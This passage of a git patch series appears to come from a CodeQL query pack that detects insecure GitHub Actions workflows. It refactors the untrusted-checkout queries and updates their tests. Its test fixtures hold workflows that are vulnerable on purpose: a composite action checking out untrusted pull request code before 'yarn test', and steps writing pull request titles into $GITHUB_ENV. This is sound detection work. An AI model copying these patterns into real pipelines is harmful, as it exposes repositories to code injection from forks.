$TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 7ea9865c70a..b3da13beda3 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -14,6 +14,7 @@ edges | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -45,5 +46,7 @@ nodes | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | semmle.label | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 2e0f79da4a0..5623964e549 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -6,6 +6,9 @@ edges | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | provenance | | | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | provenance | | +| .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | provenance | | | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | semmle.label | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | +| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | semmle.label | steps.prepare.outputs.pr | | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning4.yml:17:9:21:6 | Run Step: artifact [id] | semmle.label | Run Step: artifact [id] | | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | provenance | | +| .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | provenance | | | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | semmle.label | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | +| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | semmle.label | steps.prepare.outputs.pr | | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning4.yml:17:9:21:6 | Run Step: artifact [id] | semmle.label | Run Step: artifact [id] | | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$( Date: Fri, 12 Jul 2024 12:46:03 +0200 Subject: [PATCH 0411/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index e5e89afc471..4b237b4bfd3 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.18 +version: 0.1.19 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index db9bdecf8b8..4d522db3f98 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.18 +version: 0.1.19 groups: [actions, queries] suites: codeql-suites extractor: javascript From 7f77e89bbfa492e800e973152c0fbe2b4ece9240 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 23:31:12 +0200 Subject: [PATCH 0412/1267] feat(tests): Add test for checkout in composite action --- .../actions/dangerous-git-checkout/action.yml | 13 +++++++++++++ .../.github/workflows/untrusted_checkout3.yml | 13 +++++++++++++ .../CWE-829/UntrustedCheckoutCritical.expected | 8 ++++++++ 3 files changed, 34 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml b/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml new file mode 100644 index 00000000000..57058e7a076 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml @@ -0,0 +1,13 @@ +name: Dangerous git Checkout +description: "Git Checkout from PR code so we can run checks from forks" +runs: + using: "composite" + steps: + - name: Checkout repo + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + fetch-depth: 2 + - run: echo "foo" + shell: bash + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml new file mode 100644 index 00000000000..e0d32875ee7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml @@ -0,0 +1,13 @@ +name: Test +on: + workflow_call: + workflow_run: + workflows: [Trigger] + types: [completed] +jobs: + test: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - uses: ./.github/actions/dangerous-git-checkout + - run: yarn test diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 4431d865417..ce6d75bf113 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,4 +1,7 @@ edges +| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | +| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | @@ -332,6 +335,11 @@ edges | .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | | .github/workflows/untrusted_checkout2.yml:7:9:14:6 | Run Step: pr_number | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | +| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | +| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | +| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | +| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | From 69d173f13c2463c60e04e1aa535dacfd658daaf4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 23:47:52 +0200 Subject: [PATCH 0413/1267] fix(refactor): Remove unnecessary variables --- ql/src/Security/CWE-285/ImproperAccessControl.ql | 1 - ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 1 - ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 1 - ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql | 4 +--- ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql | 4 +--- ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql | 4 +--- 6 files changed, 3 insertions(+), 12 deletions(-) diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql index cd7cefe2dd3..3fc94d1aa22 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.ql +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql @@ -16,7 +16,6 @@ import codeql.actions.security.ControlChecks from LocalJob job, LabelCheck check, MutableRefCheckoutStep checkout, Event event where - job = checkout.getEnclosingJob() and job.isPrivileged() and job.getATriggerEvent() = event and event.getName() = "pull_request_target" and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index bbbab7bcab7..2656b22e1e3 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -20,7 +20,6 @@ query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } from LocalJob j, MutableRefCheckoutStep checkout, PoisonableStep s, ControlCheck check where - j = checkout.getEnclosingJob() and j.getAStep() = checkout and // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() = s and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index b9b3154debf..0a83cc54ad6 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -18,7 +18,6 @@ import codeql.actions.security.ControlChecks from LocalJob j, MutableRefCheckoutStep checkout, ControlCheck check where - j = checkout.getEnclosingJob() and j.getAStep() = checkout and // there are no evidences that the checked-out gets executed not checkout.getAFollowingStep() instanceof PoisonableStep and diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index a0da81bde22..02054ebbf0a 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -20,10 +20,8 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } -from LocalJob j, PRHeadCheckoutStep checkout, PoisonableStep s +from PRHeadCheckoutStep checkout, PoisonableStep s where - j = checkout.getEnclosingJob() and - j.getAStep() = checkout and // the checkout is followed by a known poisonable step checkout.getAFollowingStep() = s and // the checkout occurs in a privileged context diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index dba0dadb61b..0675603af0f 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -18,10 +18,8 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from LocalJob j, PRHeadCheckoutStep checkout +from PRHeadCheckoutStep checkout where - j = checkout.getEnclosingJob() and - j.getAStep() = checkout and // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index ca91fcb9048..8cc8e75c2af 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -18,10 +18,8 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from LocalJob j, PRHeadCheckoutStep checkout +from PRHeadCheckoutStep checkout where - j = checkout.getEnclosingJob() and - j.getAStep() = checkout and // the checkout occurs in a non-privileged context inNonPrivilegedContext(checkout) select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." From 9917c46f6ffb2cd0f5e2b6fab9528090fdbdbe09 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 23:48:52 +0200 Subject: [PATCH 0414/1267] feat(core): Add StepsContainer class A StepsContainer is an abstract class that includes all nodes with steps: Runs and LocalJobs --- ql/lib/codeql/actions/Ast.qll | 34 +++--- ql/lib/codeql/actions/ast/internal/Ast.qll | 133 ++++++++++++++------- 2 files changed, 109 insertions(+), 58 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 0662f100fe4..5c6cdc141ee 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -74,25 +74,15 @@ class CompositeAction extends AstNode instanceof CompositeActionImpl { Input getInput(string inputName) { result = super.getInput(inputName) } - LocalJob getACaller() { result = super.getACaller() } + LocalJob getACallerJob() { result = super.getACallerJob() } + + UsesStep getACallerStep() { result = super.getACallerStep() } predicate isPrivileged() { super.isPrivileged() } predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } } -/** - * An `runs` mapping in a custom composite action YAML. - * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs - */ -class Runs extends AstNode instanceof RunsImpl { - CompositeAction getAction() { result = super.getAction() } - - Step getAStep() { result = super.getAStep() } - - Step getStep(int i) { result = super.getStep(i) } -} - /** * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. @@ -213,12 +203,26 @@ abstract class Job extends AstNode instanceof JobImpl { predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } } -class LocalJob extends Job instanceof LocalJobImpl { +abstract class StepsContainer extends AstNode instanceof StepsContainerImpl { Step getAStep() { result = super.getAStep() } Step getStep(int i) { result = super.getStep(i) } } +/** + * An `runs` mapping in a custom composite action YAML. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs + */ +class Runs extends StepsContainer instanceof RunsImpl { + CompositeAction getAction() { result = super.getAction() } +} + +/** + * An Actions job within a workflow which is composed of steps. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. + */ +class LocalJob extends Job, StepsContainer instanceof LocalJobImpl { } + /** * A step within an Actions job. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. @@ -230,6 +234,8 @@ class Step extends AstNode instanceof StepImpl { If getIf() { result = super.getIf() } + StepsContainer getContainer() { result = super.getContainer() } + Step getAFollowingStep() { result = super.getAFollowingStep() } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 9416b39e105..5c07a61e66e 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -301,8 +301,10 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { result.getNode().getValue() = name } - LocalJobImpl getACaller() { - exists(LocalJobImpl caller, string gwf_path, string path | + LocalJobImpl getACallerJob() { result = this.getACallerStep().getEnclosingJob() } + + UsesStepImpl getACallerStep() { + exists(UsesStepImpl caller, string gwf_path, string path | // the workflow files may not be rooted in the parent directory of .github/workflows // extract the offset so we can remove it from the action path gwf_path = @@ -312,8 +314,7 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { .getRelativePath() .prefix(caller.getLocation().getFile().getRelativePath().indexOf(".github/workflows/")) and path = this.getLocation().getFile().getRelativePath().replaceAll(gwf_path, "") and - caller.getAStep().(UsesStepImpl).getCallee() = - path.prefix(path.indexOf(["/action.yml", "/action.yaml"])) and + caller.getCallee() = ["", "./"] + path.prefix(path.indexOf(["/action.yml", "/action.yaml"])) and result = caller ) } @@ -327,7 +328,7 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { private predicate hasExplicitWritePermission() { // a calling job has an explicit write permission - this.getACaller().getPermissions().getAPermission().matches("%write") + this.getACallerJob().getPermissions().getAPermission().matches("%write") } /** Holds if the action is privileged. */ @@ -340,10 +341,10 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { or // there is a privileged caller job ( - this.getACaller().isPrivileged() + this.getACallerJob().isPrivileged() or - not this.getACaller().isPrivileged() and - this.getACaller().getATriggerEvent().isPrivileged() + not this.getACallerJob().isPrivileged() and + this.getACallerJob().getATriggerEvent().isPrivileged() ) } @@ -351,7 +352,7 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { predicate isPrivilegedExternallyTriggerable() { // the action is externally triggerable exists(JobImpl caller, EventImpl event | - caller = this.getACaller() and + caller = this.getACallerJob() and event = caller.getATriggerEvent() and event.isExternallyTriggerable() and // the action is privileged @@ -433,33 +434,6 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { } } -class RunsImpl extends AstNodeImpl, TRunsNode { - YamlMapping n; - - RunsImpl() { this = TRunsNode(n) } - - override string toString() { result = n.toString() } - - override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - - override CompositeActionImpl getParentNode() { result.getAChildNode() = this } - - override string getAPrimaryQlClass() { result = "RunsImpl" } - - override Location getLocation() { result = n.getLocation() } - - override YamlMapping getNode() { result = n } - - /** Gets the action that this `runs` mapping is in. */ - CompositeActionImpl getAction() { result = this.getParentNode() } - - /** Gets any steps that are defined within this job. */ - StepImpl getAStep() { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) } - - /** Gets the step at the given index within this job. */ - StepImpl getStep(int i) { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) } -} - class InputsImpl extends AstNodeImpl, TInputsNode { YamlMapping n; @@ -946,14 +920,57 @@ class JobImpl extends AstNodeImpl, TJobNode { } } -class LocalJobImpl extends JobImpl { +abstract class StepsContainerImpl extends AstNodeImpl { + /** Gets any steps that are defined within this job. */ + abstract StepImpl getAStep(); + + /** Gets the step at the given index within this job. */ + abstract StepImpl getStep(int i); +} + +class RunsImpl extends StepsContainerImpl, TRunsNode { + YamlMapping n; + + RunsImpl() { this = TRunsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override CompositeActionImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "RunsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets the action that this `runs` mapping is in. */ + CompositeActionImpl getAction() { result = this.getParentNode() } + + /** Gets any steps that are defined within this job. */ + override StepImpl getAStep() { + result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) + } + + /** Gets the step at the given index within this job. */ + override StepImpl getStep(int i) { + result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) + } +} + +class LocalJobImpl extends JobImpl, StepsContainerImpl { LocalJobImpl() { n.maps(any(YamlString s | s.getValue() = "steps"), _) } /** Gets any steps that are defined within this job. */ - StepImpl getAStep() { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) } + override StepImpl getAStep() { + result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) + } /** Gets the step at the given index within this job. */ - StepImpl getStep(int i) { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) } + override StepImpl getStep(int i) { + result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) + } } class StepImpl extends AstNodeImpl, TStepNode { @@ -965,7 +982,10 @@ class StepImpl extends AstNodeImpl, TStepNode { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - override JobImpl getParentNode() { result.getAChildNode() = this } + override AstNodeImpl getParentNode() { + result.getAChildNode() = this and + (result instanceof LocalJobImpl or result instanceof RunsImpl) + } override string getAPrimaryQlClass() { result = "StepImpl" } @@ -981,12 +1001,37 @@ class StepImpl extends AstNodeImpl, TStepNode { /** Gets the value of the `if` field in this step, if any. */ IfImpl getIf() { result.getNode() = n.lookup("if") } + /** Gets the Runs or LocalJob that this step is in. */ + StepsContainerImpl getContainer() { result.getNode() = n.getParentNode() } + /** Gets a step that follows this step. */ StepImpl getAFollowingStep() { - exists(LocalJobImpl job, int i, int j | - job.getStep(i) = this and - result = job.getStep(j) and - i < j + ( + // next step in the same job + exists(LocalJobImpl job, int i, int j | + job.getStep(i) = this and + result = job.getStep(j) and + i < j + ) + or + // next steps in a composite action + exists(RunsImpl runs, int i, int j | + exists(this.getEnclosingCompositeAction()) and + runs.getStep(i) = this and + result = runs.getStep(j) and + i < j + ) + or + // next steps of the caller (in a composite action step) + result = this.getEnclosingCompositeAction().getACallerStep().getAFollowingStep() + or + // if any of the next steps is a call to a local composite actions, we should follow it + exists(LocalJobImpl job, int i, int j, CompositeActionImpl a | + job.getStep(i) = this and + i < j and + a.getACallerStep() = job.getStep(j) and + result = a.getRuns().getAStep() + ) ) } } From 44911382afd952d5052184e8ac552cb5446b1852 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 23:49:05 +0200 Subject: [PATCH 0415/1267] feat(tests): Update tests results --- .../Security/CWE-829/UntrustedCheckoutCritical.expected | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index ce6d75bf113..60f3370f6d1 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -365,5 +365,6 @@ edges | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | | .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | From c1d8ca09768247604b16f342fb630ee7aa2319d2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 13 Jul 2024 00:01:49 +0200 Subject: [PATCH 0416/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 4b237b4bfd3..f5cf222d25c 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.19 +version: 0.1.20 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 4d522db3f98..6def1dfc0c8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.19 +version: 0.1.20 groups: [actions, queries] suites: codeql-suites extractor: javascript From cc64c95dbc498be84227bf27126600a9600f3416 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 13 Jul 2024 23:28:47 +0200 Subject: [PATCH 0417/1267] feat(dataflow): Update edges predicate to only link to next step Previously each step was linking to all possible following steps. This change makes a better flow path explanation flowing from the checkout to the poisonable step, step by step --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 52 +++-- ql/src/Security/CWE-349/CachePoisoning.ql | 2 +- .../UntrustedCheckoutTOCTOUCritical.ql | 2 +- .../CWE-829/UntrustedCheckoutCritical.ql | 2 +- .../Security/CWE-349/CachePoisoning.expected | 92 -------- .../UntrustedCheckoutTOCTOUCritical.expected | 5 - .../UntrustedCheckoutCritical.expected | 207 +----------------- 8 files changed, 42 insertions(+), 322 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 5c6cdc141ee..23832b35bd5 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -236,6 +236,8 @@ class Step extends AstNode instanceof StepImpl { StepsContainer getContainer() { result = super.getContainer() } + Step getNextStep() { result = super.getNextStep() } + Step getAFollowingStep() { result = super.getAFollowingStep() } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5c07a61e66e..e920a558c73 100644 --- 